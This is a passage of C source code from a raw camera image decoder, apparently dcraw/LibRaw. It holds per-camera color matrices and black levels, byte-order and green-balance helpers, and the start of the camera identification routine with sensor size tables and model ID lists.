{ 8898,-2498,-994,-3144,11328,2066,-760,1381,4576 } },
{ "Samsung EX2F", 0, 0x7ff,
{ 10648,-3897,-1055,-2022,10573,1668,-492,1611,4742 } },
{ "Samsung NX mini", 0, 0,
{ 5222,-1196,-550,-6540,14649,2009,-1666,2819,5657 } },
{ "Samsung NX3300", 0, 0, /* same as NX3000 */
{ 8060,-2933,-761,-4504,12890,1762,-630,1489,5227 } },
{ "Samsung NX3000", 0, 0,
{ 8060,-2933,-761,-4504,12890,1762,-630,1489,5227 } },
{ "Samsung NX30", 0, 0, /* NX30, NX300, NX300M */
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung NX2000", 0, 0,
{ 7557,-2522,-739,-4679,12949,1894,-840,1777,5311 } },
{ "Samsung NX2", 0, 0xfff, /* NX20, NX200, NX210 */
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX1000", 0, 0,
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX1100", 0, 0,
{ 6933,-2268,-753,-4921,13387,1647,-803,1641,6096 } },
{ "Samsung NX11", 0, 0,
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX10", 0, 0, /* also NX100 */
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX500", 0, 0,
{ 10686,-4042,-1052,-3595,13238,276,-464,1259,5931 } },
{ "Samsung NX5", 0, 0,
{ 10332,-3234,-1168,-6111,14639,1520,-1352,2647,8331 } },
{ "Samsung NX1", 0, 0,
{ 10686,-4042,-1052,-3595,13238,276,-464,1259,5931 } },
{ "Samsung WB2000", 0, 0xfff,
{ 12093,-3557,-1155,-1000,9534,1733,-22,1787,4576 } },
{ "Samsung GX-1", 0, 0,
{ 10504,-2438,-1189,-8603,16207,2531,-1022,863,12242 } },
{ "Samsung GX20", 0, 0, /* copied from Pentax K20D */
{ 9427,-2714,-868,-7493,16092,1373,-2199,3264,7180 } },
{ "Samsung S85", 0, 0, /* DJC */
{ 11885,-3968,-1473,-4214,12299,1916,-835,1655,5549 } },
// Foveon: LibRaw color data
{ "Sigma dp0 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp1 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp2 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma dp3 Quattro", 2047, 0,
{ 13801,-3390,-1016,5535,3802,877,1848,4245,3730 } },
{ "Sigma sd Quattro H", 256, 0,
{1295,108,-311, 256,828,-65,-28,750,254}}, /* temp, same as sd Quattro */
{ "Sigma sd Quattro", 2047, 0,
{1295,108,-311, 256,828,-65,-28,750,254}}, /* temp */
{ "Sigma SD9", 15, 4095, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD10", 15, 16383, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD14", 15, 16383, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
{ "Sigma SD15", 15, 4095, /* LibRaw */
{ 14082,-2201,-1056,-5243,14788,167,-121,196,8881 } },
// Merrills + SD1
{ "Sigma SD1", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP1 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP2 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
{ "Sigma DP3 Merrill", 31, 4095, /* LibRaw */
{ 5133,-1895,-353,4978,744,144,3837,3069,2777 } },
// Sigma DP (non-Merrill versions)
{ "Sigma DP", 0, 4095, /* LibRaw */
// { 7401,-1169,-567,2059,3769,1510,664,3367,5328 } },
{ 13100,-3638,-847,6855,2369,580,2723,3218,3251 } },
{ "Sinar", 0, 0, /* DJC */
{ 16442,-2956,-2422,-2877,12128,750,-1136,6066,4559 } },
{ "Sony DSC-F828", 0, 0,
{ 7924,-1910,-777,-8226,15459,2998,-1517,2199,6818,-7242,11401,3481 } },
{ "Sony DSC-R1", 0, 0,
{ 8512,-2641,-694,-8042,15670,2526,-1821,2117,7414 } },
{ "Sony DSC-V3", 0, 0,
{ 7511,-2571,-692,-7894,15088,3060,-948,1111,8128 } },
{"Sony DSC-RX100M5", -800, 0, /* Adobe */
{6596, -2079, -562, -4782, 13016, 1933, -970, 1581, 5181 }},
{ "Sony DSC-RX100M", -800, 0, /* M2 and M3 and M4 */
{ 6596,-2079,-562,-4782,13016,1933,-970,1581,5181 } },
{ "Sony DSC-RX100", 0, 0,
{ 8651,-2754,-1057,-3464,12207,1373,-568,1398,4434 } },
{ "Sony DSC-RX10",0, 0, /* And M2/M3 too */
{ 6679,-1825,-745,-5047,13256,1953,-1580,2422,5183 } },
{ "Sony DSC-RX1RM2", 0, 0,
{ 6629,-1900,-483,-4618,12349,2550,-622,1381,6514 } },
{ "Sony DSC-RX1R", 0, 0,
{ 8195,-2800,-422,-4261,12273,1709,-1505,2400,5624 } },
{ "Sony DSC-RX1", 0, 0,
{ 6344,-1612,-462,-4863,12477,2681,-865,1786,6899 } },
{ "Sony DSLR-A100", 0, 0xfeb,
{ 9437,-2811,-774,-8405,16215,2290,-710,596,7181 } },
{ "Sony DSLR-A290", 0, 0,
{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A2", 0, 0,
{ 9847,-3091,-928,-8485,16345,2225,-715,595,7103 } },
{ "Sony DSLR-A300", 0, 0,
{ 9847,-3091,-928,-8485,16345,2225,-715,595,7103 } },
{ "Sony DSLR-A330", 0, 0,
{ 9847,-3091,-929,-8485,16346,2225,-714,595,7103 } },
{ "Sony DSLR-A350", 0, 0xffc,
{ 6038,-1484,-578,-9146,16746,2513,-875,746,7217 } },
{ "Sony DSLR-A380", 0, 0,
{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A390", 0, 0,
{ 6038,-1484,-579,-9145,16746,2512,-875,746,7218 } },
{ "Sony DSLR-A450", 0, 0xfeb,
{ 4950,-580,-103,-5228,12542,3029,-709,1435,7371 } },
{ "Sony DSLR-A580", 0, 0xfeb,
{ 5932,-1492,-411,-4813,12285,2856,-741,1524,6739 } },
{ "Sony DSLR-A500", 0, 0xfeb,
{ 6046,-1127,-278,-5574,13076,2786,-691,1419,7625 } },
{ "Sony DSLR-A5", 0, 0xfeb,
{ 4950,-580,-103,-5228,12542,3029,-709,1435,7371 } },
{ "Sony DSLR-A700", 0, 0,
{ 5775,-805,-359,-8574,16295,2391,-1943,2341,7249 } },
{ "Sony DSLR-A850", 0, 0,
{ 5413,-1162,-365,-5665,13098,2866,-608,1179,8440 } },
{ "Sony DSLR-A900", 0, 0,
{ 5209,-1072,-397,-8845,16120,2919,-1618,1803,8654 } },
{ "Sony ILCA-68", 0, 0,
{ 6435,-1903,-536,-4722,12449,2550,-663,1363,6517 } },
{ "Sony ILCA-77M2", 0, 0,
{ 5991,-1732,-443,-4100,11989,2381,-704,1467,5992 } },
{ "Sony ILCA-99M2", 0, 0, /* Adobe */
{ 6660, -1918, -471, -4613, 12398, 2485, -649, 1433, 6447}},
{ "Sony ILCE-7M2", 0, 0,
{ 5271,-712,-347,-6153,13653,2763,-1601,2366,7242 } },
{ "Sony ILCE-7SM2", 0, 0,
{ 5838,-1430,-246,-3497,11477,2297,-748,1885,5778 } },
{ "Sony ILCE-7S", 0, 0,
{ 5838,-1430,-246,-3497,11477,2297,-748,1885,5778 } },
{ "Sony ILCE-7RM2", 0, 0,
{ 6629,-1900,-483,-4618,12349,2550,-622,1381,6514 } },
{ "Sony ILCE-7R", 0, 0,
{ 4913,-541,-202,-6130,13513,2906,-1564,2151,7183 } },
{ "Sony ILCE-7", 0, 0,
{ 5271,-712,-347,-6153,13653,2763,-1601,2366,7242 } },
{ "Sony ILCE-6300", 0, 0,
{ 5973,-1695,-419,-3826,11797,2293,-639,1398,5789 } },
{ "Sony ILCE-6500", 0, 0, /* Adobe */
{ 5973,-1695,-419,-3826,11797,2293,-639,1398,5789 } },
{ "Sony ILCE", 0, 0, /* 3000, 5000, 5100, 6000, and QX1 */
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony NEX-5N", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony NEX-5R", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-5T", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-3N", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-3", 0, 0, /* Adobe */
{ 6549,-1550,-436,-4880,12435,2753,-854,1868,6976 } },
{ "Sony NEX-5", 0, 0, /* Adobe */
{ 6549,-1550,-436,-4880,12435,2753,-854,1868,6976 } },
{ "Sony NEX-6", 0, 0,
{ 6129,-1545,-418,-4930,12490,2743,-977,1693,6615 } },
{ "Sony NEX-7", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony NEX", 0, 0, /* NEX-C3, NEX-F3 */
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A33", 0, 0,
{ 6069,-1221,-366,-5221,12779,2734,-1024,2066,6834 } },
{ "Sony SLT-A35", 0, 0,
{ 5986,-1618,-415,-4557,11820,3120,-681,1404,6971 } },
{ "Sony SLT-A37", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A55", 0, 0,
{ 5932,-1492,-411,-4813,12285,2856,-741,1524,6739 } },
{ "Sony SLT-A57", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A58", 0, 0,
{ 5991,-1456,-455,-4764,12135,2980,-707,1425,6701 } },
{ "Sony SLT-A65", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony SLT-A77", 0, 0,
{ 5491,-1192,-363,-4951,12342,2948,-911,1722,7192 } },
{ "Sony SLT-A99", 0, 0,
{ 6344,-1612,-462,-4863,12477,2681,-865,1786,6899 } },
};
double cam_xyz[4][3];
char name[130];
int i, j;
if(colors>4 || colors < 1) return;
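  /* Estimate the effective black level before consulting the table:
     bl4 is the average of the four per-channel black levels, and bl64 is the
     average of the per-pixel black grid (cblack[4] x cblack[5] entries stored
     from cblack[6], capped at 4096 samples).  rblack below combines them with
     the global black and decides whether a negative table black applies. */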
int bl4=(cblack[0]+cblack[1]+cblack[2]+cblack[3])/4,bl64=0;
if(cblack[4]*cblack[5]>0)
{
for (unsigned c = 0; c < 4096 && c < cblack[4]*cblack[5]; c++)
bl64+=cblack[c+6];
bl64 /= cblack[4]*cblack[5];
}
int rblack = black+bl4+bl64;
sprintf (name, "%s %s", t_make, t_model);
for (i=0; i < sizeof table / sizeof *table; i++)
if (!strncasecmp(name, table[i].prefix, strlen(table[i].prefix))) {
if(!dng_version)
{
if (table[i].t_black>0)
{
black = (ushort) table[i].t_black;
memset(cblack,0,sizeof(cblack));
}
else if(table[i].t_black <0 && rblack == 0 )
{
black = (ushort) (-table[i].t_black);
memset(cblack,0,sizeof(cblack));
}
if (table[i].t_maximum)
maximum = (ushort) table[i].t_maximum;
}
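      /* Table entries store the camera-to-XYZ matrix scaled by 10000.
         Copy it into cam_xyz (and, in the LibRaw build, into
         imgdata.color.cam_xyz), then derive rgb_cam via cam_xyz_coeff()
         unless only the internal copy was requested. */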
if (table[i].trans[0]) {
for (raw_color = j=0; j < 12; j++)
#ifdef LIBRAW_LIBRARY_BUILD
if(internal_only)
imgdata.color.cam_xyz[0][j] = table[i].trans[j] / 10000.0;
else
imgdata.color.cam_xyz[0][j] =
#endif
((double*)cam_xyz)[j] = table[i].trans[j] / 10000.0;
#ifdef LIBRAW_LIBRARY_BUILD
if(!internal_only)
#endif
cam_xyz_coeff (rgb_cam, cam_xyz);
}
break;
}
}
void CLASS simple_coeff (int index)
{
static const float table[][12] = {
/* index 0 -- all Foveon cameras */
{ 1.4032,-0.2231,-0.1016,-0.5263,1.4816,0.017,-0.0112,0.0183,0.9113 },
/* index 1 -- Kodak DC20 and DC25 */
{ 2.25,0.75,-1.75,-0.25,-0.25,0.75,0.75,-0.25,-0.25,-1.75,0.75,2.25 },
/* index 2 -- Logitech Fotoman Pixtura */
{ 1.893,-0.418,-0.476,-0.495,1.773,-0.278,-1.017,-0.655,2.672 },
/* index 3 -- Nikon E880, E900, and E990 */
{ -1.936280, 1.800443, -1.448486, 2.584324,
1.405365, -0.524955, -0.289090, 0.408680,
-1.204965, 1.082304, 2.941367, -1.818705 }
};
int i, c;
for (raw_color = i=0; i < 3; i++)
FORCC rgb_cam[i][c] = table[index][i*colors+c];
}
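/* Guess the byte order of a stream of 16-bit samples: accumulate the squared
   differences between each word and the word two positions earlier under both
   byte orderings, and pick the ordering that yields the smoother signal.
   Returns 0x4d4d ("MM", big-endian) or 0x4949 ("II", little-endian). */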
short CLASS guess_byte_order (int words)
{
uchar test[4][2];
int t=2, msb;
double diff, sum[2] = {0,0};
fread (test[0], 2, 2, ifp);
for (words-=2; words--; ) {
fread (test[t], 2, 1, ifp);
for (msb=0; msb < 2; msb++) {
diff = (test[t^2][msb] << 8 | test[t^2][!msb])
- (test[t ][msb] << 8 | test[t ][!msb]);
sum[msb] += diff*diff;
}
t = (t+1) & 3;
}
return sum[0] < sum[1] ? 0x4d4d : 0x4949;
}
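/* Unpack one scanline's worth of bps-bit samples from each of two offsets
   (off0 and off1), reading the stream in bite-bit chunks, then compare
   diagonally adjacent samples between the two rows.  The return value,
   100 * log(sum[0]/sum[1]), serves as a green-channel balance estimate. */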
float CLASS find_green (int bps, int bite, int off0, int off1)
{
UINT64 bitbuf=0;
int vbits, col, i, c;
ushort img[2][2064];
double sum[] = {0, 0};
if(width > 2064) return 0.f; // too wide
FORC(2) {
fseek (ifp, c ? off1:off0, SEEK_SET);
for (vbits=col=0; col < width; col++) {
for (vbits -= bps; vbits < 0; vbits += bite) {
bitbuf <<= bite;
for (i=0; i < bite; i+=8)
bitbuf |= (unsigned) (fgetc(ifp) << i);
}
img[c][col] = bitbuf << (64-bps-vbits) >> (64-bps);
}
}
FORC(width-1) {
sum[ c & 1] += ABS(img[0][c]-img[1][c+1]);
sum[~c & 1] += ABS(img[1][c]-img[0][c+1]);
}
return 100 * log(sum[0]/sum[1]);
}
#ifdef LIBRAW_LIBRARY_BUILD
static void remove_trailing_spaces(char *string, size_t len)
{
if (len < 1)
    return; // not needed in practice, because sizeof(make) and sizeof(model) are 64
string[len - 1] = 0;
if (len < 3)
return; // also not needed
len = strnlen(string, len - 1);
for (int i = len - 1; i >= 0; i--)
{
if (isspace((unsigned char)string[i]))
string[i] = 0;
else
break;
}
}
#endif
/*
Identify which camera created this file, and set global variables
accordingly.
*/
void CLASS identify()
{
static const short pana[][6] = {
{ 3130, 1743, 4, 0, -6, 0 },
{ 3130, 2055, 4, 0, -6, 0 },
{ 3130, 2319, 4, 0, -6, 0 },
{ 3170, 2103, 18, 0,-42, 20 },
{ 3170, 2367, 18, 13,-42,-21 },
{ 3177, 2367, 0, 0, -1, 0 },
{ 3304, 2458, 0, 0, -1, 0 },
{ 3330, 2463, 9, 0, -5, 0 },
{ 3330, 2479, 9, 0,-17, 4 },
{ 3370, 1899, 15, 0,-44, 20 },
{ 3370, 2235, 15, 0,-44, 20 },
{ 3370, 2511, 15, 10,-44,-21 },
{ 3690, 2751, 3, 0, -8, -3 },
{ 3710, 2751, 0, 0, -3, 0 },
{ 3724, 2450, 0, 0, 0, -2 },
{ 3770, 2487, 17, 0,-44, 19 },
{ 3770, 2799, 17, 15,-44,-19 },
{ 3880, 2170, 6, 0, -6, 0 },
{ 4060, 3018, 0, 0, 0, -2 },
{ 4290, 2391, 3, 0, -8, -1 },
{ 4330, 2439, 17, 15,-44,-19 },
{ 4508, 2962, 0, 0, -3, -4 },
{ 4508, 3330, 0, 0, -3, -6 },
};
static const ushort canon[][11] = {
{ 1944, 1416, 0, 0, 48, 0 },
{ 2144, 1560, 4, 8, 52, 2, 0, 0, 0, 25 },
{ 2224, 1456, 48, 6, 0, 2 },
{ 2376, 1728, 12, 6, 52, 2 },
{ 2672, 1968, 12, 6, 44, 2 },
{ 3152, 2068, 64, 12, 0, 0, 16 },
{ 3160, 2344, 44, 12, 4, 4 },
{ 3344, 2484, 4, 6, 52, 6 },
{ 3516, 2328, 42, 14, 0, 0 },
{ 3596, 2360, 74, 12, 0, 0 },
{ 3744, 2784, 52, 12, 8, 12 },
{ 3944, 2622, 30, 18, 6, 2 },
{ 3948, 2622, 42, 18, 0, 2 },
{ 3984, 2622, 76, 20, 0, 2, 14 },
{ 4104, 3048, 48, 12, 24, 12 },
{ 4116, 2178, 4, 2, 0, 0 },
{ 4152, 2772, 192, 12, 0, 0 },
{ 4160, 3124, 104, 11, 8, 65 },
{ 4176, 3062, 96, 17, 8, 0, 0, 16, 0, 7, 0x49 },
{ 4192, 3062, 96, 17, 24, 0, 0, 16, 0, 0, 0x49 },
{ 4312, 2876, 22, 18, 0, 2 },
{ 4352, 2874, 62, 18, 0, 0 },
{ 4476, 2954, 90, 34, 0, 0 },
{ 4480, 3348, 12, 10, 36, 12, 0, 0, 0, 18, 0x49 },
{ 4480, 3366, 80, 50, 0, 0 },
{ 4496, 3366, 80, 50, 12, 0 },
{ 4768, 3516, 96, 16, 0, 0, 0, 16 },
{ 4832, 3204, 62, 26, 0, 0 },
{ 4832, 3228, 62, 51, 0, 0 },
{ 5108, 3349, 98, 13, 0, 0 },
{ 5120, 3318, 142, 45, 62, 0 },
{ 5280, 3528, 72, 52, 0, 0 }, /* EOS M */
{ 5344, 3516, 142, 51, 0, 0 },
{ 5344, 3584, 126,100, 0, 2 },
{ 5360, 3516, 158, 51, 0, 0 },
{ 5568, 3708, 72, 38, 0, 0 },
{ 5632, 3710, 96, 17, 0, 0, 0, 16, 0, 0, 0x49 },
{ 5712, 3774, 62, 20, 10, 2 },
{ 5792, 3804, 158, 51, 0, 0 },
{ 5920, 3950, 122, 80, 2, 0 },
{ 6096, 4056, 72, 34, 0, 0 }, /* EOS M3 */
{ 6288, 4056, 266, 36, 0, 0 }, /* EOS 80D */
{ 6880, 4544, 136, 42, 0, 0 }, /* EOS 5D4 */
{ 8896, 5920, 160, 64, 0, 0 },
};
static const struct {
ushort id;
char t_model[20];
} unique[] = {
{ 0x001, "EOS-1D" },
{ 0x167, "EOS-1DS" },
{ 0x168, "EOS 10D" },
{ 0x169, "EOS-1D Mark III" },
{ 0x170, "EOS 300D" },
{ 0x174, "EOS-1D Mark II" },
{ 0x175, "EOS 20D" },
{ 0x176, "EOS 450D" },
{ 0x188, "EOS-1Ds Mark II" },
{ 0x189, "EOS 350D" },
{ 0x190, "EOS 40D" },
{ 0x213, "EOS 5D" },
{ 0x215, "EOS-1Ds Mark III" },
{ 0x218, "EOS 5D Mark II" },
{ 0x232, "EOS-1D Mark II N" },
{ 0x234, "EOS 30D" },
{ 0x236, "EOS 400D" },
{ 0x250, "EOS 7D" },
{ 0x252, "EOS 500D" },
{ 0x254, "EOS 1000D" },
{ 0x261, "EOS 50D" },
{ 0x269, "EOS-1D X" },
{ 0x270, "EOS 550D" },
{ 0x281, "EOS-1D Mark IV" },
{ 0x285, "EOS 5D Mark III" },
{ 0x286, "EOS 600D" },
{ 0x287, "EOS 60D" },
{ 0x288, "EOS 1100D" },
{ 0x289, "EOS 7D Mark II" },
{ 0x301, "EOS 650D" },
{ 0x302, "EOS 6D" },
{ 0x324, "EOS-1D C" },
{ 0x325, "EOS 70D" },
{ 0x326, "EOS 700D" },
{ 0x327, "EOS 1200D" },
{ 0x328, "EOS-1D X Mark II" },
{ 0x331, "EOS M" },
{ 0x335, "EOS M2" },
{ 0x374, "EOS M3"}, /* temp */
{ 0x384, "EOS M10"}, /* temp */
{ 0x394, "EOS M5"}, /* temp */
{ 0x346, "EOS 100D" },
{ 0x347, "EOS 760D" },
{ 0x349, "EOS 5D Mark IV" },
{ 0x350, "EOS 80D"},
{ 0x382, "EOS 5DS" },
{ 0x393, "EOS 750D" },
{ 0x401, "EOS 5DS R" },
{ 0x404, "EOS 1300D" },
}, sonique[] = {
{ 0x002, "DSC-R1" },
{ 0x100, "DSLR-A100" },
{ 0x101, "DSLR-A900" },
{ 0x102, "DSLR-A700" },
{ 0x103, "DSLR-A200" },
{ 0x104, "DSLR-A350" },
{ 0x105, "DSLR-A300" },
{ 0x106, "DSLR-A900" },
{ 0x107, "DSLR-A380" },
{ 0x108, "DSLR-A330" },
{ 0x109, "DSLR-A230" },
{ 0x10a, "DSLR-A290" },
{ 0x10d, "DSLR-A850" },
{ 0x10e, "DSLR-A850" },
{ 0x111, "DSLR-A550" },
{ 0x112, "DSLR-A500" },
{ 0x113, "DSLR-A450" },
{ 0x116, "NEX-5" },
{ 0x117, "NEX-3" },
{ 0x118, "SLT-A33" },
{ 0x119, "SLT-A55V" },
{ 0x11a, "DSLR-A560" },
{ 0x11b, "DSLR-A580" },
{ 0x11c, "NEX-C3" },
{ 0x11d, "SLT-A35" },
{ 0x11e, "SLT-A65V" },
{ 0x11f, "SLT-A77V" },
{ 0x120, "NEX-5N" },
{ 0x121, "NEX-7" },
{ 0x122, "NEX-VG20E"},
{ 0x123, "SLT-A37" },
{ 0x124, "SLT-A57" },
{ 0x125, "NEX-F3" },
{ 0x126, "SLT-A99V" },
{ 0x127, "NEX-6" },
{ 0x128, "NEX-5R" },
{ 0x129, "DSC-RX100" },
{ 0x12a, "DSC-RX1" },
{ 0x12b, "NEX-VG900" },
{ 0x12c, "NEX-VG30E" },
{ 0x12e, "ILCE-3000" },
{ 0x12f, "SLT-A58" },
{ 0x131, "NEX-3N" },
{ 0x132, "ILCE-7" },
{ 0x133, "NEX-5T" },
{ 0x134, "DSC-RX100M2" },
{ 0x135, "DSC-RX10" },
{ 0x136, "DSC-RX1R" },
{ 0x137, "ILCE-7R" },
{ 0x138, "ILCE-6000" },
{ 0x139, "ILCE-5000" },
{ 0x13d, "DSC-RX100M3" },
{ 0x13e, "ILCE-7S" },
{ 0x13f, "ILCA-77M2" },
{ 0x153, "ILCE-5100" },
{ 0x154, "ILCE-7M2" },
{ 0x155, "DSC-RX100M4" },
{ 0x156, "DSC-RX10M2" },
{ 0x158, "DSC-RX1RM2" },
{ 0x15a, "ILCE-QX1" },
{ 0x15b, "ILCE-7RM2" },
{ 0x15e, "ILCE-7SM2" },
{ 0x161, "ILCA-68" },
{ 0x162, "ILCA-99M2" },
{ 0x163, "DSC-RX10M3" },
{ 0x164, "DSC-RX100M5"},
{ 0x165, "ILCE-6300" },
{ 0x168, "ILCE-6500"},
};
#ifdef LIBRAW_LIBRARY_BUILD
static const libraw_custom_camera_t
const_table[]
#else
static const struct {
unsigned fsize;
ushort rw, rh;
uchar lm, tm, rm, bm, lf, cf, max, flags;
char t_make[10], t_model[20];
ushort offset;
}
table[]
#endif
= {
{ 786432,1024, 768, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-080C" },
{ 1447680,1392,1040, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-145C" },
{ 1920000,1600,1200, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-201C" },
{ 5067304,2588,1958, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-510C" },
{ 5067316,2588,1958, 0, 0, 0, 0, 0,0x94,0,0,"AVT","F-510C",12 },
{ 10134608,2588,1958, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-510C" },
{ 10134620,2588,1958, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-510C",12 },
{ 16157136,3272,2469, 0, 0, 0, 0, 9,0x94,0,0,"AVT","F-810C" },
{ 15980544,3264,2448, 0, 0, 0, 0, 8,0x61,0,1,"AgfaPhoto","DC-833m" },
{ 9631728,2532,1902, 0, 0, 0, 0,96,0x61,0,0,"Alcatel","5035D" },
{ 31850496,4608,3456, 0, 0, 0, 0,0,0x94,0,0,"GITUP","GIT2 4:3" },
{ 23887872,4608,2592, 0, 0, 0, 0,0,0x94,0,0,"GITUP","GIT2 16:9" },
// Android Raw dumps id start
// Fields: file size in bytes, horizontal res, vertical res, flags, then Bayer order (e.g. 0x16 = BGGR, 0x94 = RGGB)
{ 1540857,2688,1520, 0, 0, 0, 0, 1,0x61,0,0,"Samsung","S3" },
{ 2658304,1212,1096, 0, 0, 0, 0, 1 ,0x16,0,0,"LG","G3FrontMipi" },
{ 2842624,1296,1096, 0, 0, 0, 0, 1 ,0x16,0,0,"LG","G3FrontQCOM" },
{ 2969600,1976,1200, 0, 0, 0, 0, 1 ,0x16,0,0,"Xiaomi","MI3wMipi" },
{ 3170304,1976,1200, 0, 0, 0, 0, 1 ,0x16,0,0,"Xiaomi","MI3wQCOM" },
{ 3763584,1584,1184, 0, 0, 0, 0, 96,0x61,0,0,"I_Mobile","I_StyleQ6" },
{ 5107712,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","UltraPixel1" },
{ 5382640,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","UltraPixel2" },
{ 5664912,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","4688" },
{ 5664912,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","4688" },
{ 5364240,2688,1520, 0, 0, 0, 0, 1 ,0x61,0,0,"OmniVisi","4688" },
{ 6299648,2592,1944, 0, 0, 0, 0, 1 ,0x16,0,0,"OmniVisi","OV5648" },
{ 6721536,2592,1944, 0, 0, 0, 0, 0 ,0x16,0,0,"OmniVisi","OV56482" },
{ 6746112,2592,1944, 0, 0, 0, 0, 0 ,0x16,0,0,"HTC","OneSV" },
{ 9631728,2532,1902, 0, 0, 0, 0, 96,0x61,0,0,"Sony","5mp" },
{ 9830400,2560,1920, 0, 0, 0, 0, 96,0x61,0,0,"NGM","ForwardArt" },
{ 10186752,3264,2448, 0, 0, 0, 0, 1,0x94,0,0,"Sony","IMX219-mipi 8mp" },
{ 10223360,2608,1944, 0, 0, 0, 0, 96,0x16,0,0,"Sony","IMX" },
{ 10782464,3282,2448, 0, 0, 0, 0, 0 ,0x16,0,0,"HTC","MyTouch4GSlide" },
{ 10788864,3282,2448, 0, 0, 0, 0, 0, 0x16,0,0,"Xperia","L" },
{ 15967488,3264,2446, 0, 0, 0, 0, 96,0x16,0,0,"OmniVison","OV8850" },
{ 16224256,4208,3082, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G3MipiL" },
{ 16424960,4208,3120, 0, 0, 0, 0, 1, 0x16,0,0,"IMX135","MipiL" },
{ 17326080,4164,3120, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G3LQCom" },
{ 17522688,4212,3120, 0, 0, 0, 0, 0,0x16,0,0,"Sony","IMX135-QCOM" },
{ 19906560,4608,3456, 0, 0, 0, 0, 1, 0x16,0,0,"Gione","E7mipi" },
{ 19976192,5312,2988, 0, 0, 0, 0, 1, 0x16,0,0,"LG","G4" },
{ 20389888,4632,3480, 0, 0, 0, 0, 1, 0x16,0,0,"Xiaomi","RedmiNote3Pro" },
{ 20500480,4656,3496, 0, 0, 0, 0, 1,0x94,0,0,"Sony","IMX298-mipi 16mp" },
{ 21233664,4608,3456, 0, 0, 0, 0, 1, 0x16,0,0,"Gione","E7qcom" },
{ 26023936,4192,3104, 0, 0, 0, 0, 96,0x94,0,0,"THL","5000" },
{ 26257920,4208,3120, 0, 0, 0, 0, 96,0x94,0,0,"Sony","IMX214" },
{ 26357760,4224,3120, 0, 0, 0, 0, 96,0x61,0,0,"OV","13860" },
{ 41312256,5248,3936, 0, 0, 0, 0, 96,0x61,0,0,"Meizu","MX4" },
{ 42923008,5344,4016, 0, 0, 0, 0, 96,0x61,0,0,"Sony","IMX230" },
// Android Raw dumps id end
{ 20137344,3664,2748,0, 0, 0, 0,0x40,0x49,0,0,"Aptina","MT9J003",0xffff },
{ 2868726,1384,1036, 0, 0, 0, 0,64,0x49,0,8,"Baumer","TXG14",1078 },
{ 5298000,2400,1766,12,12,44, 2,40,0x94,0,2,"Canon","PowerShot SD300" },
{ 6553440,2664,1968, 4, 4,44, 4,40,0x94,0,2,"Canon","PowerShot A460" },
{ 6573120,2672,1968,12, 8,44, 0,40,0x94,0,2,"Canon","PowerShot A610" },
{ 6653280,2672,1992,10, 6,42, 2,40,0x94,0,2,"Canon","PowerShot A530" },
{ 7710960,2888,2136,44, 8, 4, 0,40,0x94,0,2,"Canon","PowerShot S3 IS" },
{ 9219600,3152,2340,36,12, 4, 0,40,0x94,0,2,"Canon","PowerShot A620" },
{ 9243240,3152,2346,12, 7,44,13,40,0x49,0,2,"Canon","PowerShot A470" },
{ 10341600,3336,2480, 6, 5,32, 3,40,0x94,0,2,"Canon","PowerShot A720 IS" },
{ 10383120,3344,2484,12, 6,44, 6,40,0x94,0,2,"Canon","PowerShot A630" },
{ 12945240,3736,2772,12, 6,52, 6,40,0x94,0,2,"Canon","PowerShot A640" },
{ 15636240,4104,3048,48,12,24,12,40,0x94,0,2,"Canon","PowerShot A650" },
{ 15467760,3720,2772, 6,12,30, 0,40,0x94,0,2,"Canon","PowerShot SX110 IS" },
